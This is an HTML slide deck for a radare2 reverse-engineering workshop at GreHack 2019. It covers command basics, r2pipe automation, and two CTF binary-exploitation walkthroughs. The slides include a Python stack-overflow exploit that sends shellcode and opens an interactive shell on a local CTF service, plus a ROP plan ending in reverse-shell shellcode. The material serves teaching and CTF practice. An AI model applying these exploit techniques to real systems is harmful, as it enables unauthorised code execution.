<!DOCTYPE html>
<html>
  <head>
    <title>Radare2</title>
    <meta charset="utf-8">
		<!--
    <style>
		@font-face {
			font-family: 'Barrio';
			font-style: normal;
			font-weight: 400;
			src: local('Barrio Regular'), local('Barrio-Regular'), url(Barrio.ttf) format('truetype');
		}

		h1 { font-family: Barrio; }
		h1:before /*, h2:before, h3:before */ {
			content: '» ';
			color: #f0082d;
		}

		em{
			color: #f0082d;
			font-weight:bold;
		}

		body {
			font-family: Calibri,Candara,Segoe,Segoe UI,Optima,Arial,sans-serif;
		}

		a {
			color:#f0082d;
			text-decoration:none;
		}

		.remark-code, code  {
			background-color: #f3f3f3;
			font-size: 80%;
		}
		.hljs-default .hljs-string {
			font-weight: bold;
			color:#f0082d;
		}
		.hljs-default .hljs-keyword {
			color:#a02724;
		}

		blockquote {
			border-left: 10px solid #ccc;
			padding: 10px;
			padding-left: 20px;
			background-color: #F3F3F3;
		}

		.remark-slide-content:after {
			content: "";
			position: absolute;
			top: 10px;
			right: 0px;
			height: 40px;
			width: 120px;
			background-repeat: no-repeat;
			background-size: contain;
			background-image: url('logo.png');
		}

		.footnote {
			position: absolute;
			bottom: 3em;
			font-size: medium;
		}

		.remark-slide-content {
			font-size: x-large;
			padding: 1em 0.5em 1em 2em;
			border-left: 10px solid #f0082d;
			background-size: content;
		}

		.remark-slide-number {
			color: #000;
			font-size: medium;
		}

		.left-column {
			width: 55%;
			float: left;
		}
		.right-column {
			width: 45%;
			float: right;
		}
    </style>
	-->
  </head>
  <body>
    <textarea id="source">
---
class: middle, center

# Workshop Radare2

<img src="./r2.png"  height="100" style="margin:auto;">

## Grehack 2019

---
class: left, top

# Radare2 workshop!

- No money to buy IDA?<br>
- No java to run Ghidra?<br>
- No time to write Binary Ninja plugins to make it useful?<br>
- Failed to get a seat at the [miasm](https://grehack.fr/2019/workshops#miasm) workshop?<br>

Welcome to radare2!

---

# Agenda

1. What is this radare2 thing?
1. How do I radare2?
2. How do I impress my CTF pals with it?
3. How can I get r2 swag?
4. How do I automate things in radare2?

---

# Who are we?

### Julien (jvoisin) Voisin
- dustri.org

### Simon (smagnin) Magnin
- smagnin.org


---

# What is this radare2 thing?

### It's like vim in Dwarf Fortress, right?

---

# What is radare2?

- Reverse engineering *framework*
- Open-sauce
- Extensible
- Command-line

---


# How do I radare2?

### What do you mean "command line"?!

---

# Commands

- Every character has a purpose/meaning
	- `p` → `p`rint
	- `d` → `d`isassemble
- Combine them to form commands
	- `pd` → `print` + `disassemble`
- Everything is documented with `?`
	- `pd?`
	- recursive help via `?*`


---

# Commands (ex.)

- How do you print a hexdump?
- How do you analyze and opcode?
- XXX

---

# How do I impress my CTF 🏴 pals with it?

### Excellent, we can attack in any direction!

---

# Pop Quizz

♪ Put your hands in the air if you know about ♫

- Exploitation
- Buffer overflows
- ROP chains
- Mitigations
- CTF


---

# Sushi — BSides Vancouver CTF 2015

![logo bsides vc](./bsides-vancouver.png)

- Cool CTF, organised by nice people
- Super-easy challenge

---

# Recon and mitigations

```nasm
$ r2 ./sushi-a6cbcb6...98cb4f98c8
[0x004004a0]> i~canary
[0x004004a0]> i~format
[0x004004a0]> i~nx
[0x004004a0]> i~pic
[0x004004a0]> i~relro
```

---

# How to run the binary?

Use rarun:

```
$ rarun2 program=./sushi-a6cbc...4f98c8 listen=4444
$ rarun2 -h
```

---

# Reversing (ex.)

```nasm
[0x004004a0]> aa
[0x004004a0]> pdf
[0x004004a0]> s main
[0x004004a0]> pdf
```

What is the main function doing?

---

# Reversing (ex.)

```nasm
[0x004004a0]> aa
[0x004004a0]> pdf
[0x004004a0]> s main
[0x004004a0]> pdf
```

What is the main function doing?

```c
int main(int argc, char** argv) {
  char local_40[0x40];
  printf(“Deposit money for sushi here:     %p\n”, local_40);
  fflush(stdout);
  gets(local_40):
  printf(“Sorry, $0.%d is not enough.\n”, local_40);
  fflush(stdout);
  return 0
}

```

---

# Getting RIP control (ex.)

```nasm
$ ragg2 -P 128 -r
$ r2 -d ./sushi-a6cbc...8cb4f98c8
[0x7fd1f7ebc090]> dc
[0x004005f2]> dr=
[0x004005f2]> pd 1 @ rip
[0x004005f2]> pxW 4 @ rsp
[0x004005f2]> woO `pxW 4 @ rsp~[1]`
```

---

# Writing an exploit (ex.)

Our payload will look like this:

```python
shellcode | ‘A’* (72 - len(shellcode)) | buffer_addr
```
```python
$ ragg2 -z -i exec
```

Can you build a working exploit?

---

# Exploit

```python
import socket, struct, re

def rop(*args):  # 'Q' and not 'I' for x64
    return struct.pack('Q'*len(args), *args)

shellcode = "\x31...\x05"
s = socket.create_connection(('127.0.0.1', 4444))
buffer_addr = re.search('^Deposit money for sushi   here: (.+)$',
    s.recv(1024)).group(1)
buffer_addr = int(buffer_addr, 16)

s.send(shellcode + 'A'*(72 - len(shellcode)) +
    rop(buffer_addr) + '\n')
s.recv(1024)

while(True):
    s.send(raw_input('$ ') + '\n')
    print(s.recv(1024))
```

---

# CSAW Quals 2013 - Diary (Exploitation 300)


- CSAW quals 2013
- easy CTF challenge

---

# Mitigations (ex.)

- PIE?
- RELRO?
- NX?
- Canary?
- ASLR!

---

# What is the binary doing? (ex.)

- Hint1: some networking stuff
- Hint2: on what port does it listen?

---

# Find the username/password (ex.)

---

# Find the username/password (ex.)

- `csaw2013`
- `S1mplePWD`

---

# What is the binary doing? (ex.)

---

# What is the binary doing?

1. Asking for a `size` in `fcn.08048e52`
1. Checks that `size+1` isn't superior to `0x400` in `fcn.08048efe`
1. Read `size` chars
1. Write the chars to a file
1. Delete the file

---

# Find the vulnerability (ex.)

- Hint1: What could the vulnerability type be?
- Hint2: `atoi`


---

# Find the vulnerability (ex.)

- `size` is passed to `atoi`, returning an `int`
- `if size + 1 > 0x400` → integer overflow!
- resulting in a linear stack-based buffer-overflow

---

# Getting eip control (ex.)

```nasm
$ ragg2 -P 128 -r
$ r2 -d ./fil_chal
[0x7fd1f7ebc090]> dc
[0x004005f2]> dr=
[0x004005f2]> pd 1 @ rip
[0x004005f2]> pxW 4 @ rsp
[0x004005f2]> woO `pxW 4 @ rsp~[1]`
```

1056 bytes before overwriting EIP

---

# Get RIP control (ex.)

---

# Designing our ROP chain

1. Leak libc address of read(1) and return to the vulnerable
function
2. Compute the offset of system(2)
3. Read our command, and write it somewhere
4. Call system(3) on it
5. Send our command

But…

---

# Plot twist

1. Stack is executable
2. No jmp esp gadget
3. Write jmp esp in the .data segment
4. Return to it
5. Send our reverse-shell shellcode

---

# Find a writteable place (ex.)

- iS~w

---

# Exploit

```
read
pop;pop;pop;ret
4 (socket fd)
writeable addr
2 (size of jmp esp gadget)
writeable addr
```


---

# How can I get r2 swag?

### How much did you say for the radare2 plumbus?

---

#

---

# Do you want to automate ?

- internal ways of sequencing commands
- r2pipe (IPC)

---

# Internal basics

- pd 1; ao 1
- ao | grep name
- ao > test.txt
- ao >> test.txt

---

# Internal loops

- classic loop : @@=$$ $$+2
- foreach : @@i
- loop over a flag: afi @@ fcn.* ~name
- and many others... @@? ;)

---

# Define Macros

- define it : (foobar, pd1, ao)
- use it : .(foobar)
- don't remember your macro ? (*
- remove it : (-foobar)

---

# Macros with arguments

- (foobar arg1, pd $0)

---

# You don't like r2 cli ?

- r2pipe works with your favourite language
- NodeJS, Python, Java, Ruby, ...

---

# Install r2pipe

- npm install r2pipe
- pip install r2pipe

---

# r2pipe use

```
import r2pipe

r2 = r2pipe.open('./sushi-a6cb...98c8')
r2.cmd('aa')
print(r2.cmd('pdf'))
r2.cmd('s main')
print(r2.cmd('pdf'))
```

---

# Documentations and friendly neighbours


- The [r2book](https://radare.gitbooks.io/radare2book/content)
- [IRC](irc://irc.freenode.net/radare)/[Telegram](https://telegram.me/joinchat/ACR-FkEK2owJSzMUYjt_NQ)/…
- The [r2con]( https://www.radare.org/con/ )

---

# Cheers

 - Xarkes for inviting us!

---
background-position: center;
background-size: contain;
background-image: url(clippy.png)

   </textarea>
    <script src="./remark-latest.min.js"></script>
    <script>
      var slideshow = remark.create({highlightLines: true});
    </script>
  </body>
</html>
